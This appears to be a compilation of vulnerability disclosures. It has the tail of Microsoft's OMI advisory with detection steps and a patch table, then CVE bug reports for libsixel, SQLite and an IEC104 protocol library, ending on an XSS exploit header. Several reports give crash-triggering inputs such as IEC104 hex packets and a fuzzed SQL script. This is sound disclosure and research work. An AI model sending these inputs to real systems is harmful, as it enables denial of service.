*   Updates are available for all extensions that use OMI to address the remote execution vulnerability (RCE) and Elevation of Privilege (EoP). Customers can add defense-in-depth and protect against the RCE vulnerability by ensuring VMs are deployed within a Network Security Group (NSG) or behind a perimeter firewall and restrict access to Linux systems that expose the OMI ports (TCP 5985, 5986, and 1270). Note that ports 5985 and 5986 are also used for PowerShell Remoting on Windows and are not impacted by these vulnerabilities. For more information about configuring firewall rules for DSC and SCOM, see Azure Automation Network Configuration Details and Configuring a Firewall for Operations Manager.

**How can I detect if this vulnerability has been exploited?**

An attacker that leverages these vulnerabilities to execute commands remotely will have commands run by the SCXcore service. The SCXcore provider runs on AIX 6.1 and later, HP/UX 11.31 and later, Solaris 5.10 and later, and most versions of Linux as far back as RedHat 5.0, SuSE 10.1, and Debian 5.0. SCX has a **RunAsProvider** named ExecuteShellCommand. The ExecuteShellCommand **RunAsProvider** will execute any UNIX/Linux command using the /bin/sh shell.

*   If you have auditd enabled and are collecting execve logs, look for commands running from the working directory ‘/var/opt/microsoft/scx/tmp’.
*   You can also enable logging for the SCXadmin tool. If you enable logging using the command: ‘/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose’, you will see the commands in the /var/opt/microsoft/scx/log/scx.log. To see the commands that are executing, grep for Invoke\_ExecuteShellCommand.

More details about SCXadmin is available here: Administering and Configuring the UNIX - Linux Agent | Microsoft Docs. For more details on SCXcore, see the GitHub repo here: microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager (github.com).

Microsoft has released additional detection guidance and protections for Azure Sentinel Hunting for OMI Vulnerability Exploitation with Azure Sentinel. To further improve security protections for customers, Microsoft will continue to provide additional protections to customers as our investigation progresses. Microsoft has also provided the above detection guidance to major security software providers. Security software providers can use this detection guidance to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. For more information about these security providers, please see the Microsoft Active Protections Program.

**Are Azure Marketplace VMs impacted by these vulnerabilities?** Microsoft has identified a subset of Azure marketplace VMs that have vulnerable versions of OMI framework installed on them. Microsoft has published Azure Service Health Notifications to customers utilizing impacted VM images to provide them guidance on how to remediate their resources. Microsoft has also notified the Marketplace publishers to release new versions of the VM images for the offers with the updated OMI framework.

**Engineering teams at Microsoft are working through safe deployment practices and will periodically update this guidance with links to updated instructions and extension update availability.**

**Please use the scroll bar to view the full table.**

**Extension/Package**

**Deployment Model**

**Vulnerability Exposure**

**Vulnerable Extension Versions**

**Fixed Extension Versions**

**Updated Extension Availability**

OMI as standalone package

On Premises/ Cloud

Remote Code Execution

OMI module version 1.6.8.0 or less

OMI version v1.6.8-1

Manually download the update here

System Center Operations Manager (SCOM)

On Premises

Remote Code Execution

OMI versions 1.6.8.0 or less (OMI framework is used for Linux/Unix monitoring)

OMI version: 1.6.8-1

Manually download the update here

Azure Automation State Configuration, DSC Extension

Cloud

Remote Code Execution

Linux DSC Agent versions: 2.71.X.XX (except the fixed version or higher) 2.70.X.XX (except the fixed version or higher) 3.0.0.1 2.0.0.0

Linux DSC Agent versions: 2.71.1.25 2.70.0.30 3.0.0.3

Microsoft has completed deployment of updates. VMs that continue to be reported as vulnerable: Manually update using instructions here

Azure Automation State Configuration, DSC Extension

On Premises

Remote Code Execution

OMI versions below v1.6.8-1 (OMI framework is a pre-requisite install for DSC agent)

OMI version: 1.6.8-1

Manually update OMI using instructions here.

Log Analytics Agent

On Premises

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Manually update using instructions here

Log Analytics Agent

Cloud

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Microsoft has completed the deployment of updates. VMs that continue to be reported as vulnerable: Manually update using instructions here

Azure Diagnostics (LAD)

Cloud

Local Elevation of Privilege

LAD v4.0.0-v4.0.5 LAD v3.0.131 and earlier

LAD v4.0.15 and LAD v3.0.135

Microsoft has completed the deployment of updates.

Azure Automation Update Management

Cloud

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Microsoft has completed the deployment of updates. VMs that continue to be reported as vulnerable: Manually update using instructions here

Azure Automation Update Management

On Premises

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Manually update using instructions here

Azure Automation

Cloud

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Microsoft has completed the deployment of updates. VMs that continue to be reported as vulnerable: Manually update using instructions here

Azure Automation

On Premises

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Manually update using instructions here

Azure Security Center

Cloud

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Microsoft has completed deployment of updates.

Azure Sentinel

Cloud

Local Elevation of Privilege

OMS Agent for Linux GA v1.13.39 or less

OMS Agent for Linux GA v1.13.40-0

Microsoft has completed deployment of updates.

Container Monitoring Solution

Cloud

Local Elevation of Privilege

**See Note 1**

**See Note 2**

Updated Container Monitoring Solution Docker image is available here

Azure Stack Hub

On Premises

Local Elevation of Privilege

Azure Monitor, Update and Configuration Management Impacted Versions: 1.8 1.8.11 1.12 1.12.17 1.13.27 1.13.33

Azure Monitor, Update and Configuration Management 1.14.02

New extension version is available via the Azure Stack Hub marketplace. Manually update using instructions here

Azure Stack Hub

On Premises

Local Elevation of Privilege

Microsoft Azure Diagnostic Extension for Linux Virtual Machines Impacted Versions: 3.0.111 3.0.121

Microsoft Azure Diagnostic Extension for Linux Virtual Machines 3.1.135

New extension version is available via the Azure Stack Hub marketplace. Manually update using instructions here

Azure HDInsight

Cloud

Local Elevation of Privilege

Customers with HDInsight clusters running Ubuntu 16.0.4 **OR** customers that have enabled Azure Monitor for HDInsight cluster integration are susceptible to the Elevation of Privilege vulnerabilities OMI framework version 1.6.8.0 or less

OMI framework v1.6.8-1

Automatic updates have been completed. Where customer configuration prevented updates, customers must apply the updates by running the following script on every cluster node.

**Please use the scroll bar to view the full table.**

**Note 1** : Container Monitoring Solution Docker images with SHA ID different than sha256:12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707

**Note 2** : Fixed version in SHA ID: sha256:12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707

**Revision History:** Revision 1.0 September 16, 2021: Information published.  
Revision 1.1 September 17, 2021: Updated affected software, clarified how customers can determine which VMs are impacted by these vulnerabilities and clarified what customers can do to protect against these vulnerabilities.  
Revision 1.2 September 18, 2021: Added detection guidance.  
Revision 1.3 September 19, 2021: Updated release date for the Azure Monitor, Update and Configuration Management Azure Stack Hub extension  
Revision 1.4 September 20, 2021: Updated version number of Azure Diagnostics (LAD) and added information for new updates available for Azure Stack Hub.  
Revision 1.5 September 21, 2021: Removed the first bullet in the **How can I determine which VMS are impacted by these vulnerabilities?** section.  
Revision 1.6 September 22, 2021: Updated affected software table including HDInsight, Azure StackHub, and the date automatic updates will be enabled.  
Revision 1.7 September 24, 2021: Announced the release of several updates and deployments for Azure Automation State Configuration, DSC Extension, Log Analytics Agent, Azure Automation Update Management, Azure Automation, Azure Security Center, Azure Sentinel and Azure Stack Hub.  
Revision 1.8 September 30, 2021: Updated to reflect completion of Microsoft auto-update processes.  
Revision 1.0 October 5, 2021: Updated the version number for Azure Monitor, Update and Configuration Management to 1.14.02 for Azure Stack Hub (On-premises)

Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions

Libsixel prior to v1.8.3 contains a stack buffer overflow in the function gif_process_raster at fromgif.c.

Our fuzzer detected several crashes when converting gif file against 2df6437 (compiled with Address Sanitizer). The command to trigger that is img2sixel $POC -o /tmp/test.six where $POC can be:  
https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so\_fromgif.c%3A310\_1.gif  
https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so\_fromgif.c%3A310\_2.gif

gdb output is like:

    GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
    Copyright (C) 2018 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from /home/hongxu/FOT/libsixel/install/bin/img2sixel...done.
    Starting program: /home/hongxu/FOT/libsixel/install/bin/img2sixel hbo_fromgif.c:310_1.gif -o /tmp/test.six
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    =================================================================
    ==17533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffa7d8 at pc 0x7ffff7b5f160 bp 0x7fffffff5950 sp 0x7fffffff5948
    WRITE of size 2 at 0x7fffffffa7d8 thread T0
        #0 0x7ffff7b5f15f in gif_process_raster /home/hongxu/FOT/libsixel/src/fromgif.c:310:31
        #1 0x7ffff7b5c303 in gif_load_next /home/hongxu/FOT/libsixel/src/fromgif.c:462:22
        #2 0x7ffff7b5a25e in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:599:22
        #3 0x7ffff7b11198 in load_with_builtin /home/hongxu/FOT/libsixel/src/loader.c:858:18
        #4 0x7ffff7b10116 in sixel_helper_load_image_file /home/hongxu/FOT/libsixel/src/loader.c:1352:18
        #5 0x7ffff7b69d98 in sixel_encoder_encode /home/hongxu/FOT/libsixel/src/encoder.c:1737:14
        #6 0x515787 in main /home/hongxu/FOT/libsixel/converters/img2sixel.c:457:22
        #7 0x7ffff61a6b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
        #8 0x41a239 in _start (/home/hongxu/FOT/libsixel/install/bin/img2sixel+0x41a239)
    
    Address 0x7fffffffa7d8 is located in stack of thread T0 at offset 18296 in frame
        #0 0x7ffff7b5999f in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:555
    
      This frame has 4 object(s):
        [32, 208) 's' (line 556)
        [272, 18296) 'g' (line 557) <== Memory access at offset 18296 overflows this variable
        [18560, 18568) 'frame' (line 559)
        [18592, 18600) 'fnp' (line 560)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hongxu/FOT/libsixel/src/fromgif.c:310:31 in gif_process_raster
    Shadow bytes around the buggy address:
      0x10007fff74a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff74f0: 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2
      0x10007fff7500: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff7510: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2
      0x10007fff7520: 00 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==17533==ABORTING
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
    51	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
    #1  0x00007ffff61c5801 in __GI_abort () at abort.c:79
    #2  0x000000000050376b in __sanitizer::Abort() ()
    #3  0x0000000000500a98 in __sanitizer::Die() ()
    #4  0x00000000004e2d1d in __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) ()
    #5  0x00000000004e374b in __asan_report_store2 ()
    #6  0x00007ffff7b5f160 in gif_process_raster (s=0x7fffffff6080, g=0x7fffffff6170) at fromgif.c:310
    #7  0x00007ffff7b5c304 in gif_load_next (s=0x7fffffff6080, g=0x7fffffff6170, bgcolor=0x0) at fromgif.c:462
    #8  0x00007ffff7b5a25f in load_gif (buffer=0x62d000000400 "GIF89a\f", size=0xca, bgcolor=0x0, reqcolors=0x100, fuse_palette=0x1, fstatic=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040, allocator=0x604000000190) at fromgif.c:599
    #9  0x00007ffff7b11199 in load_with_builtin (pchunk=0x603000000e20, fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040) at loader.c:858
    #10 0x00007ffff7b10117 in sixel_helper_load_image_file (filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif", fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, finsecure=0x0, cancel_flag=0x13b61c0 <signaled>, context=0x610000000040, allocator=0x604000000190) at loader.c:1352
    #11 0x00007ffff7b69d99 in sixel_encoder_encode (encoder=0x610000000040, filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif") at encoder.c:1737
    #12 0x0000000000515788 in main (argc=0x4, argv=0x7fffffffc488) at img2sixel.c:457

CVE-2020-21050: AddressSanitizer: stack-buffer-overflow at fromgif.c:310 · Issue #75 · saitoha/libsixel

** DISPUTED ** A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.

**Describe**

There is a segmentation fault in idxGetTableInfo,causing sqlite3 crashed.

**VERSION**

git-master (commit 9d41caf361ea37e7bb91c3e0635bd9dca9f06040)

trunk (8c432642572c8c4b7251f413def0725b3b8e9e7fe10230aa0aabe86b58e5902d)

date: 2021-07-07 19:44:32

**System info**

Ubuntu 18.04.5 LTS

clang version 10.0.0

**POC content**

    create TEMP  table t1(allint);1;
    CREATE TRIGGER t02AFTER DELETE ON t1
    WHEN EXISTS ( SELECT 1 FROM t0 WHERE o00.x0= y5)
    BEGIN
    INSERT INTO t0 VALUES(o00.x);
    END;
    C@EATE TABLE a0(y RE FM t1 
    CREATE TRIGGER t00 AFTER DELETE ON t1
    WHE0)FROM t1;
    INSERT INTO t1 SELECT x+8,randomblb(400)FROM t1;
    INSERT INTO t1 SELECT x+16,randomblob(400)FROM t1;
    INSERT INTO t1 SELECT x+32,randomblob(400)FROM t1;
     INTO t1 VALUES(74,raOM t1;   /*  16 */
    SZVEPOINT one;
    INSERT INTO t120) null, L000000000000000礸t(20WAL;
    PRAGMA cache_size = 10;
    CREATE TABLE t1120) null, L000000000000000 text(20) null, U000, U000000000000000>text(300) nullC L00000000000000D text(50) nulldomblob(800) FROM t1;   /*   2 */
    INSERT INTO t1 SELECT randomblob(8ll, P000000 text(50) n*/                                                                                                                                                                                                                   ÿSERT INTO t1 SELECTGrandomblob(802001%112010) FROM t1;  ;/*   8 */
    INSERT INTO tH SELECT randomblob(000) FROM t1;   /*  16 */
    SZVEPOINT one;
    INSERT INTO t120) null, L000000000000000 text000D text(50) null, F00000000000 text(100) not null,*R0000000 int not null, S00000000) not null, A0000000000 text(30) not null, L0000000 text(200) not null, A00000000000000000 int not null, R00000 int not null, N000000000000 text(1) nÿl, N0000000000000 text(1) null, N00000000 text(1) null, N000000E00000000 text(1) null, N000000000000ÿÿ0 
    CREATE TABLE T00(C00 inX000)0,S0000 int not null, L00000000000000 text(50) not nukl, P000000 text(50) null, ISSUEID text(50) not null, OB0ECTID text(50) not null, R0000000000 int not null, C0000000000 text(50) not nulR, A0000000 text(50) not null, C000 text(20) null, L0 CROM t1;   /*   2 */ U000 int00000, P00000000000000 int00000, L000000 int00000, L00000000 int00000, U000000000M int00000, L000000 int00000, L0ERT INTO t1 VALUES(randomblob(800));t SELECT randomblob(800
    INSERT INTO t1 SELECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA cachepoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
     FROM t1;   /*   2 */ randomblob(800
    INSERT INTO t1 SELECT randomblob(800
    PRAGMA wl_checkpoint;
    INSERT INTO t1 VALUES(randoMblob(800));VACUUM;
    INSEme;
    ATTACH'merory:' AS noname;AL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkAS noname;
    ATTACH'merory:' AS inmǭJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cachb_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(rd null, C0000000000 text(50) not null, A00000nmǭJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
    INSERT INT- tÿÿÿme;
    ATTACH'merory:' AS inm§mJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = WAL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLEÿÿx PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
     CROM t1;   /*   2 */ randomblob(800
    INSERT INTO t1 SELECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA caory:' AS inm§mJ±;
    PRAGMA tage_size = 1RAGMA journal_mode = WAL;2 */
    INSERT INTO t1 SELECT randomblob(800
    PRAGMA wl]checkpoint;
    IN ERT INTO t1 VALUES(randoMblob(800));VACUUM;
    INSERT INTO t1 SEme;
    ATTACH'merory:' AS noname;
    ATTACH'merory:' AS A cache_size;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cache_s10) FROM t1; ATE T0;
    CREATE TABLE t1TTACH'merory:' AS 0;
    CREATE TABLE tF(x PRIMARY KEY);
    PRAGMA wal_chBckpoint;
    INSERT INTO t1ALUES(randomblob(800));VA 
    ώώώ
       J
    /
    .expe
          -
    -s 1:
    /
    .expώώώώώώώώώώώώώώώώώώώώώώLECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA cache_size= V0;CREA0;
    AREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INinmGmJme;
    
    

**ASAN OUTPUT**

    ==46696==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f2d6f5974e1 bp 0x7ffeecd46930 sp 0x7ffeecd460e8 T0)
    ==46696==The signal is caused by a READ memory access.
    ==46696==Hint: address points to the zero page.
        #0 0x7f2d6f5974e1  /build/glibc-S9d2JN/glibc-2.27/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
        #1 0x42f058 in strlen /home/brian/src/final/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc
        #2 0x5282b8 in idxGetTableInfo (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5282b8)
        #3 0x4d3091 in idxCreateVtabSchema (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d3091)
        #4 0x4d27e4 in sqlite3_expert_new (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d27e4)
        #5 0x5426f5 in expertDotCommand (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5426f5)
        #6 0x4e3df0 in do_meta_command (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4e3df0)
        #7 0x4fbe79 in process_input (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4fbe79)
        #8 0x4dc0c7 in main (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4dc0c7)
        #9 0x7f2d6f42abf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #10 0x41c579 in _start (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x41c579)

CVE-2021-36690: SQLite Forum: Segmentation fault in idxGetTableInfo

A segmentation violation in the Iec104_Deal_I function of IEC104 v1.0 allows attackers to cause a denial of service (DOS).

Hello. I built protocol IEC104 on my ubuntu16.04 machine with AddressSanitizer(export CFLAGS="-g -fsanitize=address" CXXFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" before make) .  
And I use prenny desock tool to build channels socket communication to the console.

But when I use the following data ( here in hexadecimal format for easy understanding but must be inputted as binary format file ) as the input to the server TCP socket 10000, there will be a SEGV during the running.  
68:87:00:21:87:00:81:00

The way I built iec104_monitor is as you sad here, just cut the main function to the bottom in ./test/main.c and change the route of source files in ./test/Makefile.

The command line is as follows:  
LD_PRELOAD="/usr/lib/x86_64-linux-gnu/libasan.so.2:/root/preeny/x86_64-linux-gnu/desock.so"  ./iec104_monitor -m server -n 1 < ./test_input  
where  
/usr/lib/x86_64-linux-gnu/libasan.so.2 is the lib of asan,  
/root/preeny/x86_64-linux-gnu/desock.so is the lib of preeny desock  
./test_input is the binary format file which contains the test input as mentioned above in hexadecimal format for easy understanding.

The runtime error information is:

    Register "Linux" IEC104 Success, < HuiXing 2014-2015 > ...
    mode :(0), port: (0), ip: (), station num: (1) 
    Iec104 Server Mode 
    Iec104 Socket Ok(10000) !
    Iec104 Bind Ok(10000) !
    Iec104 Listen Ok(10000)
    Accept ok!
    Server start get connect from 0 : 0x2328
    #####################received 
    [DumpHEX]Length:8 
    68:87:00:21:87:00:81:00
    -Iex104_Receive-,Frame Type I 
    Receive Pakage I(4224,67), Send(0,0)
    ++++Asdu Type Firmware Backoff... 
    IEC10X_Enqueue,Prio(1) elementNum(0)len(17)(17) 
    ASAN:SIGSEGV
    =================================================================
    ==11061==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x7f46d8dfe610 sp 0x7f46d8dfe5e8 T1)
    ==11061==Hint: pc points to the zero page.
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ??:0 ??
    Thread T1 created by T0 here:
        #0 0x7f46dc3c0253 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x36253)
        #1 0x4020a9 in main /root/feilong/libiec104_fuzz/asan-mode/IEC10X/main.c:299
    
    ==11061==ABORTING
    

I use gdb to debug it and the information is as following:

    [DumpHEX]Length:6 
    68:04:43:00:02:21
    Send Ok!
    hC!IEC10X_Enqueue,Prio(0) elementNum(0)len(6)(6) 
    Tester Count(2)... 
    Thread 2 "iec104_monitor" received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0x7ffff37ff700 (LWP 42308)]
    0x0000000000000000 in ?? ()
    (gdb) backtrace
    #0  0x0000000000000000 in ?? ()
    #1  0x000000000040a605 in Iec104_Deal_I (Iec104Data=Iec104Data@entry=0x7ffff37fe880, len=len@entry=137) at ../IEC10X/Iec104.c:1214
    #2  0x000000000040adac in Iex104_Receive (buf=buf@entry=0x7ffff37fe880 "h\207", len=len@entry=8) at ../IEC10X/Iec104.c:1305
    #3  0x000000000040fe67 in Iec104_main (arg=<optimized out>) at main.c:138
    #4  0x00007ffff6a306ba in start_thread (arg=0x7ffff37ff700) at pthread_create.c:333
    #5  0x00007ffff676641d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109

CVE-2020-18730: SEGV in function Iec104_Deal_I · Issue #4 · airpig2011/IEC104

A segmentation violation in the Iec104_Deal_FirmUpdate function of IEC104 v1.0 allows attackers to cause a denial of service (DOS).

Hello. I built protocol IEC104 in my ubuntu16.04 machine with AddressSanitizer(export CFLAGS="-g -fsanitize=address" CXXFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" before make) .

And I use prenny desock tool to build channels socket communication to the console.

But when I use the following data ( here in hexadecimal format for easy understanding but must be inputted as binary format file ) as the input to the server socket 10000, there will be a SEGV during the running.  
68:e0:40:00:00:83:80:68    10:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00    00:00:00:00:00:00:00:00 00:00:00:00:00:00:00:83    80:00:08 

The way I built iec104_monitor is as you sad here, just cut the main function to the bottom in ./test/main.c and change the route of source files in ./test/Makefile.

The command line is as follows:  
LD_PRELOAD="/usr/lib/x86_64-linux-gnu/libasan.so.2:/root/preeny/x86_64-linux-gnu/desock.so"  ./iec104_monitor -m server -n 1 < ./test_input  
where  
/usr/lib/x86_64-linux-gnu/libasan.so.2 is the lib of asan,  
/root/preeny/x86_64-linux-gnu/desock.so is the lib of preeny desock  
./test_input is the binary format file which contains the test input as mentioned above in hexadecimal format for easy understanding.

The run time error information is:

    Register "Linux" IEC104 Success, < HuiXing 2014-2015 > ...
    mode :(0), port: (0), ip: (), station num: (1) 
    Iec104 Server Mode 
    Iec104 Socket Ok(10000) !
    Iec104 Bind Ok(10000) !
    Iec104 Listen Ok(10000)
    Accept ok!
    Server start get connect from 0 : 0x2328
    #####################received 
    [DumpHEX]Length:43 
    68:e0:40:00:00:83:80:68    10:00:00:00:00:00:00:00
    00:00:00:00:00:00:00:00    00:00:00:00:00:00:00:00
    00:00:00:00:00:00:00:83    80:00:08
    -Iex104_Receive-,Frame Type I 
    Receive Pakage I(32,16768), Send(0,0)
    ++++Asdu Type Firmware Update... 
    -Iec104_Deal_FirmUpdate-,data finish:0,Len:208,Total Len:0 
    ASAN:SIGSEGV
    =================================================================
    ==26583==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x000000000000 sp 0x7fb0d0cfe4e8 T1)
    ==26583==Hint: pc points to the zero page.
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ??:0 ??
    Thread T1 created by T0 here:
        #0 0x7fb0d4376253 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x36253)
        #1 0x4020a9 in main /root/feilong/libiec104_fuzz/asan-mode/IEC10X/main.c:299
    
    ==26583==ABORTING
    

I use gdb to debug it and the information is as following:

    Thread 2 "iec104_monitor" received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0x7ffff37ff700 (LWP 19690)]
    0x0000000000000000 in ?? ()
    (gdb) backtrace
    #0  0x0000000000000000 in ?? ()
    #1  0x000000000040898d in Iec104_Deal_FirmUpdate (asdu=asdu@entry=0x7ffff37fe886, Len=Len@entry=226 '\342') at ../IEC10X/Iec104.c:1129
    #2  0x000000000040a631 in Iec104_Deal_I (Iec104Data=Iec104Data@entry=0x7ffff37fe880, len=len@entry=226) at ../IEC10X/Iec104.c:1208
    #3  0x000000000040adac in Iex104_Receive (buf=buf@entry=0x7ffff37fe880 "h\340@", len=len@entry=43) at ../IEC10X/Iec104.c:1305
    #4  0x000000000040fe67 in Iec104_main (arg=<optimized out>) at main.c:138
    #5  0x00007ffff6a306ba in start_thread (arg=0x7ffff37ff700) at pthread_create.c:333
    #6  0x00007ffff676641d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
    (gdb) 
    #0  0x0000000000000000 in ?? ()
    #1  0x000000000040898d in Iec104_Deal_FirmUpdate (asdu=asdu@entry=0x7ffff37fe886, Len=Len@entry=226 '\342') at ../IEC10X/Iec104.c:1129
    #2  0x000000000040a631 in Iec104_Deal_I (Iec104Data=Iec104Data@entry=0x7ffff37fe880, len=len@entry=226) at ../IEC10X/Iec104.c:1208
    #3  0x000000000040adac in Iex104_Receive (buf=buf@entry=0x7ffff37fe880 "h\340@", len=len@entry=43) at ../IEC10X/Iec104.c:1305
    #4  0x000000000040fe67 in Iec104_main (arg=<optimized out>) at main.c:138
    #5  0x00007ffff6a306ba in start_thread (arg=0x7ffff37ff700) at pthread_create.c:333
    #6  0x00007ffff676641d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
    (gdb)

CVE-2020-18731: SEGV in function Iec104_Deal_FirmUpdate · Issue #5 · airpig2011/IEC104

A persistent cross site scripting (XSS) vulnerability in the Add Categories module of Vehicle Parking Management System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Category field.

    # Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
    # Date: 2021-02-25
    # Exploit Author: Tushar Vaidya
